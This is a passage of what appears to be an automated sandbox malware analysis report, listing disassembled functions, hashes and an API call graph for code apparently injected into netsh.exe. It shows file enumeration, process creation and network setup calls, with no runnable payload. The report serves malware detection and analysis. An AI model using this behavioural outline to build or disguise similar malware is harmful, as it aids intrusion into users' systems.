                                                                                                      • RTL: Re-Waiting, xrefs: 01177BAC
                                                                                                      • RTL: Resource at %p, xrefs: 01177B8E
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01177B7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: 8bec0996a3b62f787ab37cc902aee58a5b50b78840fab5697bd4426a67d3fb76
                                                                                                      • Instruction ID: 517cdcb1de5deba8e1203100f9a518ee6b6cd543d9b2e8718ff6534595a8f651
                                                                                                      • Opcode Fuzzy Hash: 8bec0996a3b62f787ab37cc902aee58a5b50b78840fab5697bd4426a67d3fb76
                                                                                                      • Instruction Fuzzy Hash: BC41F6313057039FD728DE29C840B6AB7E5EF84724F100A2DF95ADB780E731E4058B96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0117728C
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 011772C1
                                                                                                      • RTL: Resource at %p, xrefs: 011772A3
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01177294
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 9c8d92e1b50014c07a0d764fb28de8232d94e80cc55f1fd1f98a5c56c617412a
                                                                                                      • Instruction ID: 46443e4620bb60436479b58316b1e60364533200a68318e7f7b8bf6863cc1bd3
                                                                                                      • Opcode Fuzzy Hash: 9c8d92e1b50014c07a0d764fb28de8232d94e80cc55f1fd1f98a5c56c617412a
                                                                                                      • Instruction Fuzzy Hash: 2E410331704202ABC728DE29CC45F6AB7B5FF94714F104A19F965EB380EB30E8468BD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: a16c7648dd5ca1b698310a72adbdff18226f3966242d7880bb1b45433d917c34
                                                                                                      • Instruction ID: 354de0d5d23ad8e2bbf8bbee5371fca43cad0a6f35bbb6ffd83fa1f6c1685a65
                                                                                                      • Opcode Fuzzy Hash: a16c7648dd5ca1b698310a72adbdff18226f3966242d7880bb1b45433d917c34
                                                                                                      • Instruction Fuzzy Hash: 62319A726012199FDB24DF2DCC80BEE77F8EF48614F440559E949D3100EB30AA498B60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01147D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction ID: a172ee15651aae1b94f5dacac1068885d9bb1ee67feb9a303e9c2a5ec14952c4
                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction Fuzzy Hash: 9491B171E002169BEF2CDF6DC890ABEBBA5FF44B20F54461AE965E72C0D73099418B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01109126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: 0cca8a5570251be606454a49dea01871ecfe36d1512397686da4a4cf5ed64797
                                                                                                      • Instruction ID: c9399d2679ce112a74a29f8e0e64d0fc4f759bd6c6f3e3b400b29f60060ddb17
                                                                                                      • Opcode Fuzzy Hash: 0cca8a5570251be606454a49dea01871ecfe36d1512397686da4a4cf5ed64797
                                                                                                      • Instruction Fuzzy Hash: 65811B71D012699BDB399B54CC54BEAB6B8AF08754F0041EAEA1DB7280D7715E84CFA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:420
                                                                                                      Total number of Limit Nodes:66
                                                                                                      execution_graph 94379 c17a81 94380 c17a86 94379->94380 94381 c17a72 94379->94381 94380->94381 94383 c164d0 LdrInitializeThunk LdrInitializeThunk 94380->94383 94383->94381 94384 c16680 94385 c1669c 94384->94385 94389 c166ef 94384->94389 94385->94389 94394 c278f0 94385->94394 94386 c16818 94388 c166b7 94397 c15a90 NtClose LdrInitializeThunk 94388->94397 94389->94386 94398 c15a90 NtClose LdrInitializeThunk 94389->94398 94391 c167f2 94391->94386 94399 c15c60 NtClose LdrInitializeThunk LdrInitializeThunk 94391->94399 94395 c2790d 94394->94395 94396 c2791e NtClose 94395->94396 94396->94388 94397->94389 94398->94391 94399->94386 94400 c27600 94401 c276ac 94400->94401 94403 c27628 94400->94403 94402 c276c2 NtCreateFile 94401->94402 94404 c26f00 94405 c26f1d 94404->94405 94408 37b2df0 LdrInitializeThunk 94405->94408 94406 c26f45 94408->94406 94414 c09350 94415 c09647 94414->94415 94417 c09958 94415->94417 94418 c29480 94415->94418 94419 c294a4 94418->94419 94424 c03cd0 94419->94424 94421 c294c3 94423 c294f1 94421->94423 94427 c23ee0 94421->94427 94423->94417 94431 c12a10 94424->94431 94426 c03cdd 94426->94421 94428 c23f3a 94427->94428 94430 c23f47 94428->94430 94455 c10ea0 94428->94455 94430->94423 94432 c12a27 94431->94432 94434 c12a40 94432->94434 94435 c28340 94432->94435 94434->94426 94437 c28358 94435->94437 94436 c2837c 94436->94434 94437->94436 94442 c26f50 94437->94442 94443 c26f6d 94442->94443 94449 37b2c0a 94443->94449 94444 c26f99 94446 c29810 94444->94446 94452 c27c60 94446->94452 94448 c283ea 94448->94434 94450 37b2c1f LdrInitializeThunk 94449->94450 94451 37b2c11 94449->94451 94450->94444 94451->94444 94453 c27c7a 94452->94453 94454 c27c8b RtlFreeHeap 94453->94454 94454->94448 94456 c10edb 94455->94456 94473 c17160 94456->94473 94458 c10ee3 94471 c111b2 94458->94471 94484 c298f0 94458->94484 94460 c10ef9 94461 c298f0 RtlAllocateHeap 94460->94461 94462 c10f0a 94461->94462 94463 c298f0 RtlAllocateHeap 94462->94463 94464 c10f1b 94463->94464 94472 c10fae 94464->94472 94498 c15f60 NtClose LdrInitializeThunk LdrInitializeThunk 94464->94498 94467 c1116f 94468 c111ac 94467->94468 94469 c1119e WSAStartup 94467->94469 94494 c26600 94468->94494 94469->94468 94471->94430 94487 c13ce0 94472->94487 94474 c1718c 94473->94474 94499 c17050 94474->94499 94477 c171d1 94480 c278f0 NtClose 94477->94480 94481 c171ed 94477->94481 94478 c171b9 94479 c278f0 NtClose 94478->94479 94482 c171c4 94478->94482 94479->94482 94483 c171e3 94480->94483 94481->94458 94482->94458 94483->94458 94510 c27c10 94484->94510 94486 c2990b 94486->94460 94489 c13d04 94487->94489 94488 c13d0b 94488->94467 94489->94488 94491 c13d2a 94489->94491 94513 c2acd0 LdrLoadDll 94489->94513 94492 c13d40 LdrLoadDll 94491->94492 94493 c13d57 94491->94493 94492->94493 94493->94467 94495 c2665a 94494->94495 94497 c26667 94495->94497 94514 c111d0 94495->94514 94497->94471 94498->94472 94500 c17146 94499->94500 94501 c1706a 94499->94501 94500->94477 94500->94478 94505 c26ff0 94501->94505 94504 c278f0 NtClose 94504->94500 94506 c2700d 94505->94506 94509 37b35c0 LdrInitializeThunk 94506->94509 94507 c1713a 94507->94504 94509->94507 94511 c27c2d 94510->94511 94512 c27c3e RtlAllocateHeap 94511->94512 94512->94486 94513->94491 94531 c17430 94514->94531 94516 c111f0 94521 c116d5 94516->94521 94535 c2a8f0 94516->94535 94518 c113f1 94540 c2aa20 94518->94540 94521->94497 94522 c11406 94524 c11555 94522->94524 94526 c11431 94522->94526 94546 c23f60 94522->94546 94550 c0fe60 94524->94550 94526->94521 94527 c23f60 LdrInitializeThunk 94526->94527 94528 c0fe60 LdrInitializeThunk 94526->94528 94554 c173d0 94526->94554 94527->94526 94528->94526 94529 c1155f 94529->94526 94530 c173d0 LdrInitializeThunk 94529->94530 94530->94529 94532 c1743d 94531->94532 94533 c17465 94532->94533 94534 c1745e SetErrorMode 94532->94534 94533->94516 94534->94533 94536 c2a900 94535->94536 94537 c2a906 94535->94537 94536->94518 94538 c298f0 RtlAllocateHeap 94537->94538 94539 c2a92c 94538->94539 94539->94518 94541 c2a990 94540->94541 94542 c2a9ed 94541->94542 94543 c298f0 RtlAllocateHeap 94541->94543 94542->94522 94544 c2a9ca 94543->94544 94545 c29810 RtlFreeHeap 94544->94545 94545->94542 94547 c23fba 94546->94547 94549 c23fdb 94547->94549 94558 c15080 94547->94558 94549->94522 94551 c0fe7c 94550->94551 94563 c27b70 94551->94563 94555 c173e3 94554->94555 94568 c26e50 94555->94568 94557 c1740e 94557->94526 94560 c1503a 94558->94560 94559 c1510e 94559->94549 94560->94559 94561 c26f50 LdrInitializeThunk 94560->94561 94562 c15056 94561->94562 94562->94549 94564 c27b8d 94563->94564 94567 37b2c70 LdrInitializeThunk 94564->94567 94565 c0fe82 94565->94529 94567->94565 94569 c26ec6 94568->94569 94570 c26e77 94568->94570 94573 37b2dd0 LdrInitializeThunk 94569->94573 94570->94557 94571 c26eeb 94571->94557 94573->94571 94574 c1f0d0 94575 c1f0ed 94574->94575 94576 c13ce0 2 API calls 94575->94576 94577 c1f10b 94576->94577 94578 c16850 94579 c16868 94578->94579 94581 c168c2 94578->94581 94579->94581 94582 c1a470 94579->94582 94583 c1a496 94582->94583 94584 c1a6b5 94583->94584 94609 c27cf0 94583->94609 94584->94581 94586 c1a50c 94586->94584 94587 c2aa20 2 API calls 94586->94587 94588 c1a528 94587->94588 94588->94584 94589 c1a5f9 94588->94589 94590 c26f50 LdrInitializeThunk 94588->94590 94591 c14f10 LdrInitializeThunk 94589->94591 94593 c1a618 94589->94593 94592 c1a584 94590->94592 94591->94593 94592->94589 94597 c1a58d 94592->94597 94598 c1a69d 94593->94598 94615 c26b10 94593->94615 94594 c1a5e1 94595 c173d0 LdrInitializeThunk 94594->94595 94599 c1a5ef 94595->94599 94596 c1a5bf 94630 c230f0 LdrInitializeThunk 94596->94630 94597->94584 94597->94594 94597->94596 94612 c14f10 94597->94612 94600 c173d0 LdrInitializeThunk 94598->94600 94599->94581 94604 c1a6ab 94600->94604 94604->94581 94605 c1a674 94620 c26bb0 94605->94620 94607 c1a68e 94625 c26cf0 94607->94625 94610 c27d0d 94609->94610 94611 c27d1e CreateProcessInternalW 94610->94611 94611->94586 94614 c14f4e 94612->94614 94631 c27120 94612->94631 94614->94596 94616 c26b82 94615->94616 94617 c26b34 94615->94617 94637 37b39b0 LdrInitializeThunk 94616->94637 94617->94605 94618 c26ba7 94618->94605 94621 c26c25 94620->94621 94623 c26bd7 94620->94623 94638 37b4340 LdrInitializeThunk 94621->94638 94622 c26c4a 94622->94607 94623->94607 94626 c26d62 94625->94626 94627 c26d14 94625->94627 94639 37b2fb0 LdrInitializeThunk 94626->94639 94627->94598 94628 c26d87 94628->94598 94630->94594 94632 c271c5 94631->94632 94634 c27147 94631->94634 94636 37b2d10 LdrInitializeThunk 94632->94636 94633 c2720a 94633->94614 94634->94614 94636->94633 94637->94618 94638->94622 94639->94628 94640 c14f90 94641 c173d0 LdrInitializeThunk 94640->94641 94642 c14fc0 94641->94642 94644 c14fec 94642->94644 94645 c17350 94642->94645 94646 c17394 94645->94646 94647 c173b5 94646->94647 94652 c26c50 94646->94652 94647->94642 94649 c173a5 94650 c173c1 94649->94650 94651 c278f0 NtClose 94649->94651 94650->94642 94651->94647 94653 c26cc2 94652->94653 94654 c26c74 94652->94654 94657 37b4650 LdrInitializeThunk 94653->94657 94654->94649 94655 c26ce7 94655->94649 94657->94655 94658 c1b710 94660 c1b739 94658->94660 94659 c1b83d 94660->94659 94661 c1b7e3 FindFirstFileW 94660->94661 94661->94659 94662 c1b7fe 94661->94662 94663 c1b824 FindNextFileW 94662->94663 94663->94662 94664 c1b836 FindClose 94663->94664 94664->94659 94665 c206d0 94666 c206ec 94665->94666 94667 c20714 94666->94667 94668 c20728 94666->94668 94670 c278f0 NtClose 94667->94670 94669 c278f0 NtClose 94668->94669 94671 c20731 94669->94671 94672 c2071d 94670->94672 94675 c29930 RtlAllocateHeap 94671->94675 94674 c2073c 94675->94674 94676 c27850 94677 c278bc 94676->94677 94679 c27874 94676->94679 94678 c278d2 NtDeleteFile 94677->94678 94685 c26d90 94686 c26e17 94685->94686 94688 c26db7 94685->94688 94690 37b2ee0 LdrInitializeThunk 94686->94690 94687 c26e48 94690->94687 94691 c20251 94703 c27760 94691->94703 94693 c20272 94694 c20290 94693->94694 94695 c202a5 94693->94695 94697 c278f0 NtClose 94694->94697 94696 c278f0 NtClose 94695->94696 94700 c202ae 94696->94700 94698 c20299 94697->94698 94699 c202da 94700->94699 94701 c29810 RtlFreeHeap 94700->94701 94702 c202ce 94701->94702 94704 c277fc 94703->94704 94706 c27784 94703->94706 94705 c27812 NtReadFile 94704->94705 94705->94693 94706->94693 94709 c102e0 94710 c102fa 94709->94710 94711 c13ce0 2 API calls 94710->94711 94712 c10318 94711->94712 94713 c1035d 94712->94713 94714 c1034c PostThreadMessageW 94712->94714 94714->94713 94715 c248a0 94716 c248fa 94715->94716 94718 c24907 94716->94718 94719 c22450 94716->94719 94720 c22491 94719->94720 94721 c13ce0 2 API calls 94720->94721 94723 c22596 94720->94723 94724 c224d7 94721->94724 94722 c22510 Sleep 94722->94724 94723->94718 94724->94722 94724->94723 94725 c20a60 94729 c20a6f 94725->94729 94726 c20ab6 94727 c29810 RtlFreeHeap 94726->94727 94728 c20ac6 94727->94728 94729->94726 94730 c20af7 94729->94730 94732 c20afc 94729->94732 94731 c29810 RtlFreeHeap 94730->94731 94731->94732 94733 c11f6a 94736 c15800 94733->94736 94735 c11fa3 94738 c15833 94736->94738 94737 c15857 94737->94735 94738->94737 94743 c27460 94738->94743 94740 c1587a 94740->94737 94741 c278f0 NtClose 94740->94741 94742 c158fa 94741->94742 94742->94735 94744 c2747a 94743->94744 94747 37b2ca0 LdrInitializeThunk 94744->94747 94745 c274a6 94745->94740 94747->94745 94748 37b2ad0 LdrInitializeThunk 94749 c092f0 94750 c092ff 94749->94750 94751 c09340 94750->94751 94752 c0932d CreateThread 94750->94752 94753 c162b0 94754 c162da 94753->94754 94757 c17200 94754->94757 94756 c16304 94758 c1721d 94757->94758 94764 c27040 94758->94764 94760 c1726d 94761 c17274 94760->94761 94762 c27120 LdrInitializeThunk 94760->94762 94761->94756 94763 c1729d 94762->94763 94763->94756 94765 c270d3 94764->94765 94766 c27067 94764->94766 94769 37b2f30 LdrInitializeThunk 94765->94769 94766->94760 94767 c2710c 94767->94760 94769->94767 94770 c18eb0 94771 c18eb7 94770->94771 94771->94770 94772 c18ed8 94771->94772 94773 c29810 RtlFreeHeap 94771->94773 94773->94772 94774 c1e7f0 94775 c1e854 94774->94775 94776 c15800 2 API calls 94775->94776 94778 c1e97d 94776->94778 94777 c1e984 94778->94777 94799 c15910 94778->94799 94780 c1eb23 94781 c1ea00 94781->94780 94782 c1eb32 94781->94782 94803 c1e5d0 94781->94803 94783 c278f0 NtClose 94782->94783 94785 c1eb3c 94783->94785 94786 c1ea35 94786->94782 94787 c1ea40 94786->94787 94788 c298f0 RtlAllocateHeap 94787->94788 94789 c1ea69 94788->94789 94790 c1ea72 94789->94790 94791 c1ea88 94789->94791 94792 c278f0 NtClose 94790->94792 94812 c1e4c0 CoInitialize 94791->94812 94794 c1ea7c 94792->94794 94795 c278f0 NtClose 94796 c1eb1c 94795->94796 94798 c29810 RtlFreeHeap 94796->94798 94797 c1ea96 94797->94795 94798->94780 94800 c15935 94799->94800 94814 c27260 94800->94814 94804 c1e5ec 94803->94804 94805 c13ce0 2 API calls 94804->94805 94807 c1e60a 94805->94807 94806 c1e613 94806->94786 94807->94806 94808 c13ce0 2 API calls 94807->94808 94809 c1e6de 94808->94809 94810 c13ce0 2 API calls 94809->94810 94811 c1e738 94809->94811 94810->94811 94811->94786 94813 c1e525 94812->94813 94813->94797 94815 c2727a 94814->94815 94818 37b2c60 LdrInitializeThunk 94815->94818 94816 c159a9 94816->94781 94818->94816 94819 c19f70 94824 c19ca0 94819->94824 94821 c19f7d 94838 c19940 94821->94838 94823 c19f99 94825 c19cc5 94824->94825 94849 c17620 94825->94849 94828 c19e02 94828->94821 94830 c19e19 94830->94821 94831 c19e10 94831->94830 94833 c19f01 94831->94833 94864 c193a0 94831->94864 94835 c19f59 94833->94835 94873 c19700 94833->94873 94836 c29810 RtlFreeHeap 94835->94836 94837 c19f60 94836->94837 94837->94821 94839 c19956 94838->94839 94847 c19961 94838->94847 94840 c298f0 RtlAllocateHeap 94839->94840 94840->94847 94841 c19977 94841->94823 94842 c17620 GetFileAttributesW 94842->94847 94843 c19c6e 94844 c19c87 94843->94844 94845 c29810 RtlFreeHeap 94843->94845 94844->94823 94845->94844 94846 c193a0 RtlFreeHeap 94846->94847 94847->94841 94847->94842 94847->94843 94847->94846 94848 c19700 RtlFreeHeap 94847->94848 94848->94847 94850 c17641 94849->94850 94851 c17648 GetFileAttributesW 94850->94851 94852 c17653 94850->94852 94851->94852 94852->94828 94853 c21d30 94852->94853 94854 c21d3e 94853->94854 94855 c21d45 94853->94855 94854->94831 94856 c13ce0 2 API calls 94855->94856 94857 c21d7a 94856->94857 94858 c21d89 94857->94858 94877 c21800 LdrLoadDll LdrLoadDll 94857->94877 94860 c298f0 RtlAllocateHeap 94858->94860 94863 c21f21 94858->94863 94862 c21da2 94860->94862 94861 c29810 RtlFreeHeap 94861->94863 94862->94861 94862->94863 94863->94831 94865 c193c6 94864->94865 94878 c1cbe0 94865->94878 94867 c1942d 94869 c195b0 94867->94869 94870 c1944b 94867->94870 94868 c19595 94868->94831 94869->94868 94871 c19260 RtlFreeHeap 94869->94871 94870->94868 94883 c19260 94870->94883 94871->94869 94874 c19726 94873->94874 94875 c1cbe0 RtlFreeHeap 94874->94875 94876 c197a2 94875->94876 94876->94833 94877->94858 94880 c1cbf6 94878->94880 94879 c1cc03 94879->94867 94880->94879 94881 c29810 RtlFreeHeap 94880->94881 94882 c1cc3c 94881->94882 94882->94867 94884 c19276 94883->94884 94887 c1cc50 94884->94887 94886 c1937c 94886->94870 94888 c1cc74 94887->94888 94889 c1cd0c 94888->94889 94890 c29810 RtlFreeHeap 94888->94890 94889->94886 94890->94889 94891 c128fc 94892 c17050 2 API calls 94891->94892 94893 c1290c 94892->94893 94894 c12921 94893->94894 94895 c278f0 NtClose 94893->94895 94895->94894

                                                                                                      Executed Functions

                                                                                                      Function 00C09350 Relevance: 31.6, Strings: 25, Instructions: 382COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 c09350-c09645 1 c09656-c09662 0->1 2 c09647-c09650 0->2 3 c09672-c0967e 1->3 4 c09664-c09670 1->4 2->1 5 c09680-c0969b 3->5 6 c0969d 3->6 4->2 5->3 7 c096a4-c096ab 6->7 8 c096cc-c096dd 7->8 9 c096ad-c096ca 7->9 10 c096ee-c096fa 8->10 9->7 11 c0970a 10->11 12 c096fc-c09708 10->12 14 c09711-c0971a 11->14 12->10 15 c09720-c09739 14->15 16 c098e5-c098ef 14->16 15->15 18 c0973b-c09747 15->18 17 c09900-c09909 16->17 19 c0991b-c09922 17->19 20 c0990b-c09911 17->20 21 c09749-c0976a 18->21 22 c0976c-c0977c 18->22 25 c09924-c0992e 19->25 26 c09958-c0995f 19->26 23 c09913-c09916 20->23 24 c09919 20->24 21->18 22->22 27 c0977e-c09791 22->27 23->24 24->17 29 c09934-c0993d 25->29 30 c09961-c09977 26->30 31 c09984-c0998d 26->31 32 c097a2-c097ae 27->32 37 c09953 call c29480 29->37 38 c0993f-c09951 29->38 39 c09982 30->39 40 c09979-c0997f 30->40 33 c099b2-c099b9 31->33 34 c0998f-c099b0 31->34 35 c097b0-c097c2 32->35 36 c097c4-c097e6 32->36 42 c099f1-c099f8 33->42 43 c099bb-c099ef 33->43 34->31 35->32 44 c097e8-c09802 36->44 45 c0983b-c09842 36->45 37->26 38->29 39->26 40->39 48 c099fa-c09a10 42->48 49 c09a1d-c09a27 42->49 43->33 47 c09813-c0981f 44->47 50 c09844-c09867 45->50 51 c09869-c09870 45->51 52 c09821-c09834 47->52 53 c09836 47->53 54 c09a12-c09a18 48->54 55 c09a1b 48->55 56 c09a38-c09a41 49->56 50->45 57 c09872-c09895 51->57 58 c09897-c0989d 51->58 52->47 53->16 54->55 55->42 60 c09a53-c09a5a 56->60 61 c09a43-c09a49 56->61 57->51 62 c098a1-c098a8 58->62 67 c09a65-c09a6b 60->67 63 c09a51 61->63 64 c09a4b-c09a4e 61->64 65 c098e0 62->65 66 c098aa-c098de 62->66 63->56 64->63 65->14 66->62 68 c09a7b-c09a82 67->68 69 c09a6d-c09a79 67->69 72 c09a84-c09a9a 68->72 73 c09aa7-c09ab1 68->73 69->67 74 c09aa5 72->74 75 c09a9c-c09aa2 72->75 74->68 75->74
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C$,$1$1$2$6$9$;O$<$<-$B$Ep$H$I$_$jZ$nc$wW$x$}$ $7$L$i$}
                                                                                                      • API String ID: 0-4254166177
                                                                                                      • Opcode ID: 701afc884af9f53524de023afd2e908aadc33d9ec2389d3eac306fd31ff74744
                                                                                                      • Instruction ID: 9dc5fd1718ac354aa419f45cf30d3117de881b1dc4f09b4456e4b934fed76ce5
                                                                                                      • Opcode Fuzzy Hash: 701afc884af9f53524de023afd2e908aadc33d9ec2389d3eac306fd31ff74744
                                                                                                      • Instruction Fuzzy Hash: 6312ADB0D05229CBEB24CF45C894BEDBBB2FB44308F2481D9D1496B392C7B95A89DF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C1B710 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00C1B7F4
                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 00C1B82F
                                                                                                      • FindClose.KERNELBASE(?), ref: 00C1B83A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: 1d473383974680754585aace9c030498db415fb415f930e95e21ff184487225f
                                                                                                      • Instruction ID: 88a4cd21db68e6e58512b79205e767844952823e197bb3f3a7595608b7e82ece
                                                                                                      • Opcode Fuzzy Hash: 1d473383974680754585aace9c030498db415fb415f930e95e21ff184487225f
                                                                                                      • Instruction Fuzzy Hash: D3316E71A00348BBEB20DFA0CC85FEF777CAF45B05F144459F918A6191DA70AE85DBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C27600 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00C276F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: ff238927d6e438750ecf7d8393effdb85e04f43f862e0f60662f41dc9b5c0b1e
                                                                                                      • Instruction ID: c95988989c3079e74bde3958b312f1f79642c00ca0ed319c821e432f4c89a4f3
                                                                                                      • Opcode Fuzzy Hash: ff238927d6e438750ecf7d8393effdb85e04f43f862e0f60662f41dc9b5c0b1e
                                                                                                      • Instruction Fuzzy Hash: AC31D3B5A01608AFDB14DF99D881EDEB7F9EF8C314F508219F918A3340D770A851CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C27760 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00C2783B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 07f1b093c8ac46202dd93a3a0b20a7864efae37e8d884af7c551f8ee2be6021f
                                                                                                      • Instruction ID: d170dfdfa9036cc65e84249a82546087425a961c7cd7996895b239e615a293b0
                                                                                                      • Opcode Fuzzy Hash: 07f1b093c8ac46202dd93a3a0b20a7864efae37e8d884af7c551f8ee2be6021f
                                                                                                      • Instruction Fuzzy Hash: 3F31D2B5A01248AFDB14DF99DC81EEEB7B9EF8C714F108209F918A7241D674A811CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C27850 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 4033686569-0
                                                                                                      • Opcode ID: 50534f20ffc5672809148808016a6915c0ab32bbbc46f4291d9df044d7672cf6
                                                                                                      • Instruction ID: 6706a11d1d002291019dc89639937c946b040448d5454fcc61ac1d81331649c0
